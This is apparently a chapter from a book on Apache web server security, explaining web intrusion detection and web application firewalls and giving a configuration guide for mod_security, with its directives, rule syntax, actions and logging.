In spite of all your efforts to secure a web server, there is one part you do not and usually cannot control in its entirety: web applications. Web application design, programming, and maintenance require a different skill set. Even if you have the skills, in a typical organization these tasks are usually assigned to someone other than a system administrator. But the problem of ensuring adequate security remains. This final chapter suggests ways to secure applications by treating them as black boxes and examining the way they interact with the environment. The techniques that do this are known under the name intrusion detection.
This chapter covers the following:
Evolution of intrusion detection
Basic intrusion detection principles
Web application firewalls
mod_security
Intrusion detection has been in use for many years. Its purpose is to detect attacks by looking at the network traffic or by looking at operating system events. The term intrusion prevention is used to refer to systems that are also capable of preventing attacks.
Today, when people mention intrusion detection, in most cases they are referring to a network intrusion detection system (NIDS). An NIDS works on the TCP/IP level and is used to detect attacks against any network service, including the web server. The job of such systems, the most popular and most widely deployed of all IDSs, is to monitor raw network packets to spot malicious payload. Host-based intrusion detection systems (HIDSs), on the other hand, work on the host level. Though they can analyze network traffic (only the traffic that arrives to that single host), this task is usually left to NIDSs. Host-based intrusion is mostly concerned with the events that take place on the host (such as users logging in and out and executing commands) and the system error messages that are generated. An HIDS can be as simple as a script watching a log file for error messages, as mentioned in Chapter 8. Integrity validation programs (such as Tripwire) are a form of HIDS. Some systems can be complex: one form of HIDS uses system call monitoring on a kernel level to detect processes that behave suspiciously.
Using a single approach for intrusion detection is insufficient. Security information management (SIM) systems are designed to manage various security-relevant events they receive from agents, where an agent can listen to the network traffic or operating system events or can work to obtain any other security-relevant information.
Because many NIDSs are in place, a large effort was made to make the most of them and to use them for web intrusion detection, too. Though NIDSs work well for the problems they were designed to address and they can provide some help with web intrusion detection, they do not and cannot live up to the full web intrusion detection potential for the following reasons:
NIDSs were designed to work with TCP/IP. The Web is based around the HTTP protocol, which is a completely new vocabulary. It comes with its own set of problems and challenges, which are different from the ones of TCP/IP.
The real problem is that web applications are not simple users of the HTTP protocol. Instead, HTTP is only used to carry the application-specific data. It is as though each application builds its own protocol on top of HTTP.
Many new protocols are deployed on top of HTTP (think of Web Services, XML-RPC, and SOAP), pushing the level of complexity further up.
Other problems, such as the inability of an NIDS to see through encrypted SSL channels (which most web applications that are meant to be secure use) and the inability to cope with a large amount of web traffic, make NIDSs insufficient tools for web intrusion detection.
Vendors of NIDSs have responded to the challenges by adding extensions to better understand HTTP. The term deep-inspection firewalls refers to systems that make an additional effort to understand the network traffic on a higher level. Ultimately, a new breed of IDSs was born. Web application firewalls (WAFs), also known as web application gateways, are designed specifically to guard web applications. Designed from the ground up to support HTTP and to exploit its transactional nature, web application firewalls often work as reverse proxies. Instead of going directly to the web application, a request is rerouted to go to a WAF first and only allowed to proceed if deemed safe.
Web application firewalls were designed from the ground up to deal with web attacks and are better suited for that purpose. NIDSs are better suited for monitoring on the network level and cannot be replaced for that purpose.
Though most vendors are focusing on supporting HTTP, the concept of application
firewalls can be applied to any application and protocol. Commercial products have
become available that act as proxies for other popular network protocols and for popular
databases. (Zorp, at http://www.balabit.com/products/zorp/
, available under a commercial
and open source license, is one such product.)
Learn more about intrusion detection to gain a better understanding of common problems. I have found the following resources useful:
“Intrusion Detection FAQ” by SANS (http://www.sans.org/resources/idfaq/
)
Managing Security with Snort & IDS Tools by Kerry J. Cox and Christopher Gerg (O’Reilly)
Sometimes there is a controversy as to whether we are correct to pursue this approach to increasing security. A common counterargument is that web intrusion detection does not solve the real problem, and that it is better to go directly to the problem and fix weak web applications. I agree with this opinion generally, but the reality is preventing us from letting go from IDS techniques:
Achieving 100-percent security is impossible because we humans have limited capabilities and make mistakes.
Attempting to approach 100-percent security is not done in most cases. In my experience, those who direct application development usually demand features, not security. Attitudes are changing, but slowly.
A complex system always contains third-party products whose quality (security-wise) is unknown. If the source code for the products is unavailable, then you are at the mercy of the vendor to supply the fixes.
We must work with existing vulnerable systems.
As a result, I recommend we raise awareness about security among management and developers. Since awareness will come slowly, do what you can in the meantime to increase security.
I already covered one form of web intrusion detection in Chapter 8. Log-based web intrusion detection makes use of the fact that web servers produce detailed access logs, where the information about every request is kept. It is also possible to create logs in special formats to control which data is collected. This cost-effective method introduces intrusion detection to a system but there is a drawback. Log-based web intrusion detection is performed only after transactions take place; therefore, attack prevention is not possible. Only detection is. If you can live with that (it is a valid decision and it depends on your threat model), then you only need to take a few steps to implement this technique:
Make sure logging is configured and takes place on all web servers.
Optionally reconfigure logging to log more information than that configured by default.
Collect all logs to a central location.
Implement scripts to examine the logs regularly, in real time or in batch mode (e.g., daily).
That is all there is to it. (Refer to Chapter 8 for a detailed discussion.)
With real-time intrusion detection, not only can you detect problems, but you can react to them as well. Attack prevention is possible, but it comes with a price tag of increased complexity and more time required to run the system. Most of this chapter discusses the ways of running real-time web intrusion detection. There are two approaches:
One network node screens HTTP traffic before it reaches the destination.
An intrusion detection agent is embedded within the web server.
Which of these two you choose depends on your circumstances. The web server-based approach is easy to implement since it does not mandate changes to the network design and configuration. All that is needed is the addition of a module to the web server. But if you have many web servers, and especially if the network contains proprietary web servers, then having a single place from which to perform intrusion detection can be the more efficient approach. Though network-based web IDSs typically perform full separation of clients and servers, web server-based solutions can be described more accurately as separating clients from applications, with servers left unprotected in the middle. In this case, therefore, network-based protection is better because it can protect from flaws in web servers, too.
With Apache and mod_security
you can choose either approach to
real-time web intrusion detection. If network-based web intrusion detection suits
your needs best, then you can build such a node by installing an additional Apache
instance with mod_security
to work in a reverse proxy
configuration. (Reverse proxy operation is discussed in Chapter 9.) Aside from initial configuration,
the two modes of operation are similar. The rest of this chapter applies equally to
both.
Later in this chapter, I will present a web intrusion detection solution based on open source components. The advantage of using open source components is they are free and familiar (being based on Apache). Products from the commercial arena have more features, and they have nice user interfaces that make some tasks much easier. Here I will present the most important aspects of web IDSs, even if some features are present only in commercial products. I expect the open source products to catch up, but at this point a discussion of web intrusion detection cannot be complete without including features available only in commercial products. The following sections describe some common intrusion detection features.
If you read through various RFCs, you may detect a recurring theme. Most RFCs recommend that implementations be conservative about how they use protocols, but liberal with respect to what they accept from others. Web servers behave this way too, but such behavior opens the door wide open for all sorts of attacks. Almost all IDSs perform some sort of sanity check on incoming requests and refuse to accept anything that is not in accordance with the HTTP standard. Furthermore, they can narrow down the features to those that are acceptable to the application and thus reduce the attack surface area.
If you have ever worked to develop a firewall policy, you may have been given (good) advice to first put rules in place to deny everything, and then proceed to allow what is safe. That is a positive security model. On the other side is a negative security model, in which everything that is not dangerous is allowed. The two approaches each ask a question:
Positive security model: What is safe?
Negative security model: What is dangerous?
A negative security model is used more often. You identify a dangerous pattern and configure your system to reject it. This is simple, easy, and fun, but not foolproof. The concept relies on you knowing what is dangerous. If there are aspects of the problem you are not aware of (which happens from time to time) then you have left a hole for the attacker to exploit.
A positive security model (also known as a white-list model) is a better approach to building policies and works well for firewall policy building. In the realm of web application security, a positive security model approach boils down to enumerating every script in the application. For each script in the list, you need to determine the following:
Allowed request methods (e.g.,
GET
/POST
or
POST
only)
Allowed Content-Type
Allowed Content-Length
Allowed parameters
Which parameters are mandatory and which are optional
The type of every parameter (e.g., text or integer)
Additional parameter constraints (where applicable)
This is what programmers are supposed to do but frequently do not. Using the positive security model is better if you can afford to spend the time to develop it. One difficult aspect of this approach is that the application model changes as the application evolves. You will need to update the model every time a new script is added to the application or if an existing one changes. But it works well to protect stable, legacy applications that no one maintains anymore.
Automating policy development can ease problems:
Some IDSs can observe the traffic and use it to build the policy automatically. Some can do it in real time.
With white-list protection in place, you may be able to mark certain IP addresses as trusted, and configure the IDS to update the policy according to the observed traffic.
If an application is built with a comprehensive set of regression tests (to simulate correct behavior), playing the tests while the IDS is watching will result in a policy being created automatically.
Rule-based IDSs comprise the majority of what is available on the market. In principle, every request (or packet in the case of NIDS) is subject to a series of tests, where each test consists of one or more inspection rules. If a test fails, the request is rejected as invalid.
Rule-based IDSs are easy to build and use and are efficient when used to defend against known problems or when the task is to build a custom defense policy. But since they must know about the specifics of every threat to protect from it, these tools must rely on using extensive rule databases. Vendors maintain rule databases and distribute their tools with programs to update IDS installations automatically.
This approach is unlikely to be able to protect custom applications or to protect from zero-day exploits (exploits that attack vulnerabilities not yet publicly known). This is where anomaly-based IDSs work better.
The idea behind anomaly-based protection is to build a protection layer that will observe legal application traffic and then build a statistical model to judge the future traffic against. In theory, once trained, an anomaly-based system should detect anything out of the ordinary. With anomaly-based protection, rule databases are not needed and zero-day exploits are not a problem. Anomaly-based protection systems are difficult to build and are thus rare. Because users do not understand how they work, many refuse to trust such systems, making them less popular.
A frequent web security problem occurs where the web programming model is misunderstood and programmers think the browser can be trusted. If that happens, the programmers may implement input validation in the browser using JavaScript. Since the browser is just a simple tool under control of the user, an attacker can bypass such input validation easily and send malformed input directly to the application.
A correct approach to handling this problem is to add server-side validation to the application. If that is impossible, another way is to add an intermediary between the client and the application and to have the intermediary reinterpret the JavaScript embedded in the web page.
The stateless nature of the HTTP protocol has many negative impacts on web application security. Sessions can and should be implemented on the application level, but for many applications the added functionality is limited to fulfilling business requirements other than security. Web IDSs, on the other hand, can throw their full weight into adding various session-related protection features. Some of the features include:
At most web sites, you can start browsing from any site URL that is known to you. This is often convenient for attackers and inconvenient for defenders. An IDS that understands sessions will realize the user is making his first request and redirect him back to the default entry point (possibly logging the event).
Being able to distinguish one session from another opens interesting possibilities, e.g., it becomes possible to watch the rate at which requests are made and the way users navigate through the application going from one page to another. Looking at the behavior of just one user it becomes much easier to detect intrusion attempts.
Brute-force attacks normally go undetected in most web applications. With state management in place, an IDS tracks unusual events (such as login failures), and it can be configured to take action when a threshold is reached. It is often convenient to slow down future authentication attempts slightly, not enough for real users to notice but enough to practically stop automated scripts. If an authentication script takes 50 milliseconds to make a decision, a script can make around 20 attempts per second. If you introduce a delay of, say, one second, that will bring the speed to under one attempt per second. That, combined with an alert to someone to investigate further, would provide a decent defense.
Sessions can be expired after the default timeout expires, and users would be required to re-authenticate. Users can be logged out after a time of inactivity.
In most cases, session hijacking results in a change of IP address and some other request data (that is, request headers are likely to be different). A stateful monitoring tool can detect the anomalies and prevent exploitation from taking place. The recommended action to take is to terminate the session, ask the user to re-authenticate, and log a warning.
Some tools can be strict and only allow users to follow the links that have been given in the previous response. This seems like an interesting feature but can be difficult to implement. One problem with it is that it prevents the user from using more than one browser window with the application. Another problem is that it can cause incompatibilities with applications using JavaScript to construct links dynamically.
One area where network-based IDSs have had trouble with web traffic is with respect to evasion techniques (see Chapter 10). The problem is there are so many ways to alter incoming (attack) data, so it keeps the original meaning and the application interprets it, but it is modified sufficiently to sneak under the IDS radar. This is an area where dedicated web IDSs are providing significant improvement. For example, just by looking at whole HTTP requests at a time, an entire class of attacks based on request fragmentation is avoided. And because they understand HTTP well and can separate dynamic requests from requests for static resources (and so choose not to waste time protecting static requests that cannot be compromised), they can afford to apply many different anti-evasion techniques that would prove too time consuming for NIDSs.
Information leak prevention is a fancy name for response monitoring. In principle it is identical to request monitoring, and its goal is to watch the output for suspicious patterns and prevent the response from reaching the client when such a pattern is detected. The most likely candidates for patterns in output are credit card numbers and social security numbers. Another use for this technique is to watch for signs of successful intrusions, as I will demonstrate later in the chapter.
It is impossible to prevent information leak by a determined and skillful attacker, since he will always be able to encode the information in such a way as to prevent detection by an IDS. Still, this technique can protect when the attacker does not have full control over the server but instead tries to exploit a weakness in the application.
mod_security
is a web application firewall module I developed for
the Apache web server. It is available under the open source GPL license, with
commercial support and commercial licensing as an option. I originally designed it as a
means to obtain a proper audit log, but it grew to include other security features.
There are two versions of the module, one for each major Apache branch, and they are
almost identical in functionality. In the Apache 2 version,
mod_security
uses the advanced filtering API available in that
version, making interception of the response body possible. The Apache 2 version is also
more efficient in terms of memory consumption. In short, mod_security
does the following:
Intercepts HTTP requests before they are fully processed by the web server
Intercepts the request body (e.g., the POST
payload)
Intercepts, stores, and optionally validates uploaded files
Performs anti-evasion actions automatically
Performs request analysis by processing a set of rules defined in the configuration
Intercepts HTTP responses before they are sent back to the client (Apache 2 only)
Performs response analysis by processing a set of rules defined in the configuration
Takes one of the predefined actions or executes an external script when a request or a response fails analysis (a process called detection)
Depending on the configuration, a failed request may be prevented from being processed, and a failed response may be prevented from being seen by the client (a process called prevention)
Performs audit logging
In this section, I present a deployment guide for mod_security
, but
the principles behind it are the same and can be applied to any web application
firewall. For a detailed reference manual, visit the project documentation area at
http://www.modsecurity.org/documentation/
.
The basic ingredients of every mod_security
configuration are:
Anti-evasion features
Encoding validation features
Rules (to detect invalid requests)
Actions (to handle invalid requests)
The purpose of this section is to present enough information as to how these
ingredients interact with each other to enable you to configure and use
mod_security
. The subsequent sections will cover some
advanced topics to give you more insight needed in some specific cases.
To install mod_security
, you need to compile it using the
apxs
tool, as you would any other module. Some
contributors provide system-specific binaries for download, and I put links to
their web sites at http://www.modsecurity.org/download/
. If you have installed
Apache from source, apxs
will be with other Apache binaries
in the /usr/local/apache/bin/
folder. If you cannot find
the apxs
tool on your system, examine the vendor-provided
documentation to learn how to add it. For example, on Red Hat systems
apxs
is a part of the httpd-devel
package.
Position to the correct source code directory (there’s one directory for each Apache branch) and execute the following commands:
#/usr/local/apache/bin/apxs -cia mod_security.c
#/usr/local/apache/bin/apachectl stop
#/usr/local/apache/bin/apachectl start
After having restarted Apache, mod_security
will be active
but disabled. I recommend the following configuration to enable it with minimal
chances of denying legitimate requests. You can enable
mod_security
with fewer configuration directives. Most
options have default settings that are the same as the following configurations,
but I prefer to configure things explicitly rather than wonder if I understand
what the default settings are:
# Enable mod_security SecFilterEngine On # Retrieve request payload SecFilterScanPOST On # Reasonable automatic validation defaults SecFilterCheckURLEncoding On SecFilterCheckCookieFormat Off SecFilterNormalizeCookies Off SecFilterCheckUnicodeEncoding Off # Accept almost all byte values SecFilterForceByteRange 1 255 # Reject invalid requests with status 403 SecFilterDefaultAction deny,log,status:403 # Only record the relevant information SecAuditEngine RelevantOnly SecAuditLog /var/www/logs/audit_log # Where to store temporary and intercepted files SecUploadDir /var/www/logs/files/ # Do not store intercepted files for the time being SecUploadKeepFiles Off # Use 0 for the debug level in production # and 4 for testing SecFilterDebugLog /var/www/logs/modsec_debug_log SecFilterDebugLevel 4
Starting from the top, this configuration data enables
mod_security
and tells it to intercept request bodies,
configures settings for various encoding validation and anti-evasion features
(explained below), configures the default action list to handle invalid
requests, and configures the two log types.
After adding the configuration data to your httpd.conf
file, make a couple of requests to the web server and examine the
audit_log
and modsec_debug_log
files. Without any rules configured, there won’t be much output in the debug log
but at least you will be certain the module is active.
You must understand what mod_security
does and in what
order for every request. Generally, processing consists of four phases:
At the beginning of this phase, mod_security
determines whether it should process the request. No processing will
be performed unless the module is explicitly enabled in
configuration (via SecFilterEngine
On
). Similarly, if the module is configured only
to process dynamic requests (via SecFilterEngine
DynamicOnly
) and the current request is for a
static resource, processing will end immediately.
If the processing is to continue, the module will initialize its
structures, read in the complete request body (if one is present and
if request body buffering is enabled), and perform initial request
validation as defined in the configuration. The initial request
validation covers the whole of the request: the first line, the
headers, and the parameters. If any part of the request fails
validation, the request will be rejected. This will happen even if
the default action (configured using the
SecFilterDefaultAction
directive) is
configured to allow requests to proceed in case of a rule match.
This exception is necessary for mod_security
to
have consistent internal structures to base the rest of processing
on. If you do not want a request to be rejected under any
circumstances, then disable all encoding validation options.
In the input analysis phase, the rule engine is activated to apply rules to the requests and perform actions specified in the configuration. If the request passes this phase, Apache will call the request handler to process the request.
The output analysis phase exists only in the Apache 2 version of
the module and only occurs if output buffering is enabled. In that
case, mod_security
intercepts output and stores
it until the entire response is generated. After that, the rule
engine is activated again but this time to analyze the response
data.
The logging phase is the last to take place. This phase does not
depend on previous phases. For example, the
mod_security
rule engine may be turned off
but the audit engine may continue to work. Similar to what takes
place at the beginning of the initialization phase, the first task
that is performed at the beginning of the logging phase is to
determine whether logging should take place, based on your
configuration.
As mentioned in Chapter 10, evasion
techniques can be used to sneak in malicious payload undetected by web intrusion
detection software. To counter that, mod_security
performs
the following anti-evasion techniques automatically:
Decodes URL-encoded text (e.g., changing %26
to
&
)
Converts Windows folder separation characters to Unix folder
separation characters (\
to
/
)
Removes self references (converting /./
to
/
)
Removes redundant folder separation characters (e.g., changing
//
to /
)
Changes content to lowercase
Converts null bytes to spaces
In some ways, encoding validation can be treated as anti-evasion. As mentioned previously, web servers and applications are often very flexible and allow invalid requests to be processed anyway. Using one of the following encoding validation options, it is possible to restrict what is accepted:
Certain invalid URL encodings (e.g., %XV
, as
explained in Chapter 10) can
be used to bypass application security mechanisms. When URL encoding
validation is turned on for mod_security
,
requests will be rejected if any of the two possible invalid
encoding situations are encountered: invalid hexadecimal numbers or
missing hexadecimal numbers.
Invalid or overlong Unicode characters are often dangerous. Turning on Unicode encoding validation can detect three types of problems: invalid characters, missing bytes, and overlong characters. This type of validation is off by default since many applications do not understand Unicode, and it is not possible to detect whether they do by looking at a request. Applications that are not Unicode aware sometimes use character combinations that are valid but that resemble special Unicode characters. Unicode validation would interpret such combinations as attacks and lead to false positives.
This option enforces strict cookie formats. It is disabled by default.
Cookie values are often URL encoded though such encoding is not mandated by the specification. Performing normalization (which includes all anti-evasion actions) on the value allows a rule to see through the encoding. However, if URL encoded cookies are not used, false positives are possible. Enable cookie value normalization only if appropriate.
Some applications use a small range of byte values (such as
0
-255
). For example,
applications designed only for the English-speaking population might
only use values between 32 and 126, inclusive. Restricting the bytes
that can be used in a request to a small range can be beneficial as
it reduces the chances of successful buffer overflow attack. This
validation option is controlled with the
SecFilterForceByteRange
directive (as
described in the Section
12.2.5.2).
The best part of mod_security
is its flexible rule engine.
In the simplest form, a rule requires only a single keyword. The
SecFilter
directive performs a broad search against the
request parameters, as well as against the request body for
POST
requests:
SecFilter KEYWORD
If the keyword is detected, the rule will be triggered and will cause the default action list to be executed.
The keyword is actually a regular expression pattern. Using a simple string,
such as 500
, will find its occurrence anywhere in the search
content. To make full use of mod_security
, learn about
regular expressions. If you are unfamiliar with them, I suggest the link
http://www.pcre.org/pcre.txt
as a good
starting point. If you prefer a book, check out Mastering Regular
Expressions by Jeffrey E. F. Friedl (O’Reilly), which is
practically a regular expression reference guide.
Here are a couple of points I consider important:
Some characters have special meanings in regular expressions. The
pattern 1.1
matches string 1.1
,
but it also matches 101
because a dot is meant to
represent any one character. To match a dot in the string, you must
escape it in the pattern by preceding it with a
backslash character like this: 1\.1
.
If you want to match a whole string, you must use special characters
to the regular expression engine, such as in ^1\.1$
.
The ^
character matches the beginning of the string,
while the $
character matches the end. Without them,
1\.1
would match 1.1
, but it
would also match 1001.100
.
When an exclamation mark is used as the first character in a pattern,
it negates the pattern. For example, the pattern
!attack
causes a rule match if the searched
string does not contain the pattern attack
.
I will demonstrate what can be done with regular expressions with a regular
expression pattern you will find useful in the real world:
^[0-9]{1,9}$
. This pattern matches only numbers and only
ones that have at least one but up to nine digits.
Apache 1 and Apache 2 use different regular expression engines. The
regular expression engine of the Apache 1 branch is not well documented. It
works mostly as you would expect, but there are slight differences with the
Apache 2 engine. Apache 2 bundles the PCRE engine (http://www.pcre.org
), which is well documented and widely
used in other open source products (such as PHP and Python). If you are
normally writing regular expressions for one Apache branch, do not expect
the other branch to interpret the same expressions in the same way.
Although broad rules are easy to write, they usually do not work well in real
life. Their use significantly increases the chances of introducing false
positives and reducing system availability to its legitimate users (not to
mention the annoyance they cause). A much better approach to rule design is to
consider the impact and only apply rules to certain parts of HTTP requests. This
is what SecFilterSelective
is for. For example, the following
rule will look for the keyword only in the query string:
SecFilterSelective QUERY_STRING KEYWORD
The QUERY_STRING
variable is one of the supported
variables. The complete list is given in Tables Table 12-1 (standard variables
available for use with mod_rewrite
or CGI scripts) and Table 12-2 (extended variables
specific to mod_security
). In most cases, the variable names
are the same as those used by mod_rewrite
and the CGI
specification.
Table 12-1. Standard rule variables
Variable name |
Description |
---|---|
|
IP address of the client. |
|
Host name of the client, when available. |
|
Authenticated username, when available. |
|
Remote username (provided by the |
|
Request method (e.g., |
|
Full system path for the script being executed. |
|
The extra part of the URI given after the script name. For
example, if the URI is |
|
The part of the URI after the question mark, when
available (e.g. |
|
The string |
|
Path to the document root, as specified with the
|
|
The email address of the server administrator, as
specified with the |
|
The hostname of the server, as specified with the
|
|
The IP address of the server where the request was received. |
|
Server port where the request was received. |
|
The protocol specified in the request (e.g.,
|
|
Apache version, as configured with
|
|
Current year (e.g., |
|
Current month as a number (e.g., |
|
Current day of month as a number. |
|
Current hour as a number in a 24-hour day (e.g.,
|
|
Current minute. |
|
Current second. |
|
Current weekday as a number (e.g., |
|
Current time as a combination of individual elements
listed above in the form |
|
Complete first line of the request (e.g., |
|
The second token on the request line (e.g.,
|
|
A synonym for |
Table 12-2. Extended rule variables
Variable Name |
Description |
---|---|
|
Gives access to the raw request body except for requests
using the |
|
Value of the header |
|
Value of the environment variable
|
|
Value of the parameter
|
|
Gives direct access to a single string containing all
parameters and their values, which is equal to the combined
value of |
|
Number of parameters in the request. |
|
List of the names of all parameters given to the script. |
|
List of the values of all parameters given to the script. |
|
The filesystem name of the file contained in the request
and associated with the script parameter
|
|
The size of file uploaded in the parameter
|
|
Number of files contained in the request. |
|
List of the filesystem names of all files contained in the request. |
|
List of the sizes of all files. |
|
List of all request headers, in the form “Name: Value“. |
|
Number of headers in the request. |
|
List of the names of all headers in the request. |
|
List of the values of all headers in the request. |
|
The |
|
The |
|
The username equivalent to the |
|
The group name equivalent to the |
|
Script permissions, in the standard Unix format, with four digits with a leading zero (e.g., 0755). |
|
Value of the cookie
|
|
Number of cookies in the request. |
|
List of the names of all cookies given to the script. |
|
List of the values of all cookies given to the script. |
When using selective rules, you are not limited to examining one field at a time. You can separate multiple variable names with a pipe. The following rule demonstrates how to access named parts of the request, in this example, a parameter and a cookie:
# Look for the keyword in the parameter "authorized"
# and in the cookie "authorized". A match in either of
# them will trigger the rule.
SecFilterSelective ARG_authorized|COOKIE_authorized KEYWORD
If a variable is absent in the current request the variable will be treated as empty. For example, to detect the presence of a variable, use the following format, which triggers execution of the default action list if the variable is not empty:
SecFilterSelective ARG_authorized !^$
A special syntax allows you to create exceptions. The following applies the
rule to all parameters except the parameter html
:
SecFilterSelective ARGS|!ARG_html KEYWORD
Finally, single rules can be combined to create more complex expressions. In my favorite example, I once had to deploy an application that had to be publicly available because our users were located anywhere on the Internet. The application has a powerful, potentially devastating administration account, and the login page for users and for the administrator was the same. It was impossible to use other access control methods to restrict administrative logins to an IP address range. Modifying the source code was not an option because we had no access to it. I came up with the following two rules:
SecFilterSelective ARG_username ^admin$ chain SecFilterSelective REMOTE_ADDR !^192\.168\.254\.125$
The first rule triggers whenever someone tries to log in as an administrator
(it looks for a parameter username
with value
admin
). Without the optional action
chain
being specified, the default action list would be
executed. Since chain
is specified, processing continues with
execution of the second rule. The second rule allows the request to proceed if
it is coming from a single predefined IP address
(192.168.254.125
). The second rule never executes unless
the first rule is satisfied.
You can do many things when an invalid request is discovered. The
SecFilterDefaultAction
determines the default action
list:
# Reject invalid requests with status 403 SecFilterDefaultAction deny,log,status:403
You can override the default action list by supplying a list of actions to individual rules as the last (optional) parameter:
# Only log a warning message when the KEYWORD is found
SecFilter KEYWORD
log,pass
If you use the optional third parameter to specify per-rule actions, you must ensure all the actions you want to take place are listed. This is because the list you supply replaces the default action list, therefore none of the default actions take place.
The full list of supported actions is given in Table 12-3.
Table 12-3. mod_security action list
Action |
Description |
---|---|
|
Skip over the remaining rules and allow the request to be processed. |
|
Log the request to the audit log. |
|
Chain the current rule with the one that follows. Process the next rule if the current rule matches. This feature allows many rules to be used as one, performing a logical AND. |
|
Deny request processing. |
|
Execute the external script specified by filename on rule match. |
|
Assign a unique ID n to the rule. The ID will appear in the log. Useful when there are many rules designed to handle the same problem. |
|
Log the rule match. A message will go into the Apache error log and into the audit log (if such logging is enabled). |
|
Assign a message |
|
Do not log the request to the audit log. All requests that trigger a rule will be written to the audit log by default (unless audit logging is completely disabled by configuration). This action should be used when you don’t want a request to appear in the audit log (e.g., it may be too long and you do not need it). |
|
Do not log the rule match. |
|
Proceed to the next rule in spite of the current rule match. This is useful when you want to perform some action but otherwise don’t want to reject the request. |
|
Pause for |
|
Perform a redirection to the address specified by
|
|
Set the environment variable
|
|
On rule match skip the next |
|
Configure the status |
There are three places where, depending on the configuration, you may find
mod_security
logging information:
mod_security
debug logThe mod_security
debug log, if enabled via the
SecFilterDebugLevel
and
SecFilterDebugLog
directives, contains a
large number of entries for every request processed. Each log entry
is associated with a log level, which is a number from 0 (no
messages at all) to 4 (maximum logging). The higher the log level
you specify, the more information you get in error logs. You
normally need to keep the debug log level at 0 and increase it only
when you are debugging your rule set. Excessive logging slows down
server operation.
Some of the messages from the debug log will make it into the
Apache error log (even if you set the
mod_security
debug log level to
0
). These are the messages that require an
administrator’s attention, such as information about requests being
rejected.
mod_security
audit logWhen audit logging is enabled (using the
SecAuditEngine
and
SecAuditLog
directives),
mod_security
can record each request (and its
body, provided request body buffering is enabled) and the
corresponding response headers. (I expect future versions of
mod_security
will be able to log response
bodies, too.) Whether or not information is recorded for all
requests or only some depends on the configuration (see Chapter 8).
Here is an example of an error message resulting from invalid content discovered in a cookie:
[Tue Oct 26 17:44:36 2004] [error] [client 127.0.0.1] mod_security: Access denied with code 500. Pattern match "!(^$|^[a-zA-Z0-9]+$)" at COOKIES_VALUES(sessionid) [hostname "127.0.0.1"] [uri "/cgi-bin/modsec-test.pl"] [unique_id bKjdINmgtpkAADHNDC8AAAAB]
The message indicates that the request was rejected (“Access denied”) with an
HTTP 500
response because the content of the cookie
sessionid
contained content that matched the pattern
!(^$|^[a-zA-Z0-9]+$)
. (The pattern allows a cookie to be
empty, but if it is not, it must consist only of one or more letters and
digits.)
In addition to the basic information presented in the previous sections, some
additional (important) aspects of mod_security
operation are
presented here.
For each request, mod_security
activities take place after
Apache performs initial work on it but before the actual request processing
starts. During the first part of the work, Apache sometimes decides the request
can be fulfilled or rejected without going to the subsequent processing phases.
Consequently, mod_security
is never executed. These
occurrences are not cause for concern, but you need to know about them before
you start wondering why something you configured does not work.
Here are some situations when Apache finishes early:
When the request contains a URL-encoded forward slash
(%2f
) or null-byte (%00
)
character in the script path (see Chapter
2).
When the request is determined to be invalid. (For example, if the request line is too big, as is the case with some Microsoft IIS worms that roam around.)
When the request can be fulfilled by Apache directly. This is the case
with the TRACE
method.
The performance of the rule database is directly related to how many rules are in the configuration. For all normal usage patterns, the number of rules is small, and thus, there is practically no impact on the request processing speed. The only serious impact comes from increased memory consumption in the case of file uploads and Apache 1, which is covered in the next section.
In some circumstances, requests that perform file upload will be slower. If you enable the feature to intercept uploaded files, there will be an additional overhead of writing the file to disk. The exact slowdown depends on the speed of the filesystem, but it should be small.
The use of mod_security
results in increased memory
consumption by the Apache web server. The increase can be very small, but it can
be very big in some rare circumstances. Understanding why it happens will help
you avoid problems in those rare circumstances.
When mod_security
is not active, Apache only sees the first
part of the request: the request line (the first line of the request) and the
subsequent headers. This is enough for Apache to do its work. When request
processing begins, the module that does the processing feeds the request body to
where it needs to be consumed. In the case of PHP, for example, the request body
goes directly to PHP. Apache almost never sees it. With
mod_security
enabled, it becomes a requirement to have
access to the complete request body before processing begins. That is the only
approach that can protect the application. (Early versions of
mod_security
did look at the body bit by bit but that
proved to be insufficient.) That is why mod_security
reads
the complete request into its own buffer and later feeds it from there to the
processing module. Additional memory space is needed so that the anti-evasion
processing can take place. A buffer twice the size of the request body is
required by mod_security
to complete processing.
In most cases, this is not a problem since request bodies are small. The only
case when it can be a problem is when file upload functionality is required.
Files can be quite large (sizes of over 100 MB are not unheard of), and
mod_security
will want to put all of them into memory,
twice. If you are running Apache 1, there is no way around this but to disable
request body buffering (as described near the end of this chapter) for those
parts of the application where file upload takes place. You can also (and
probably should) limit the maximum size of the body by using the Apache
configuration directive LimitRequestBody
. But there is good
news for the users of Apache 2. Because of its powerful content filtering API,
mod_security
for Apache 2 is able to stream the request
body to the disk if its size is larger than a predefined value (using the
directive SecUploadInMemoryLimit
, set to 64 KB by default), so increased memory consumption does not
take place. However, mod_security
will need to store the
complete request to the disk and read it again when it sends it forward for
processing.
A similar thing happens when you enable output monitoring (described later in
this chapter). Again, the output cannot and will not be delivered to the client
until all of it is available to mod_security
and after the
analysis takes place. This process introduces response buffering. At the moment,
there is no way to limit the amount of memory spent doing output buffering, but
it can be used in a controlled manner and only enabled for HTML or text files,
while disabled for binary files, via output filtering, described later in this
chapter.
It is possible to use mod_security
in the main server, in
virtual hosts, and in per-directory contexts. Practically all configuration
directives support this. (The ones that do not, such as
SecChrootDir
, make no sense outside of the main server
configuration.) This allows a different policy to be implemented wherever
necessary.
Configuration and rule inheritance is also implemented. Rules added to the
main server will be inherited by all virtual hosts, but there is an option to
start from scratch (using the SecFiltersInheritance
directive). On the same note, you can use mod_security
from
within .htaccess
files (if the
AllowOverride
option Options
is
specified), but be careful not to allow someone you do not trust to have access
to this feature.
Although mod_security
supports the exec
action, which allows a custom script to be executed upon detecting an invalid
action, Apache offers two mechanisms that allow for tight integration and more
flexibility.
One mechanism you should use is the ErrorDocument
, which
allows a script to be executed (among other things) whenever request processing
returns with a particular response status code. This feature is frequently used
to create a “Page not found” message. Depending on your security policy, the
same feature can be used to explain that the security system you put in place
believes something funny is going on and, therefore, decided to reject the
request. At the same time, you can add code to the script to do something else,
for example, to send a notification somewhere. An example script for Apache
integration comes with the mod_security
distribution.
The other thing you can do is add mod_unique_id
(distributed with Apache and discussed in Chapter
8) into your configuration. After you do, this module will generate a
unique ID (guaranteed to be unique within the server) for every request, storing
it in the environment variable UNIQUE_ID
(where it will be
picked up by mod_security
). This feature is great to enable
you to quickly find what you are looking for. I frequently use it in the output
of an ErrorDocument
script, where the unique ID is presented
to the user with the instructions to cite it as reference when she complains to
the support group. This allows you to quickly and easily pinpoint and solve the
problem.
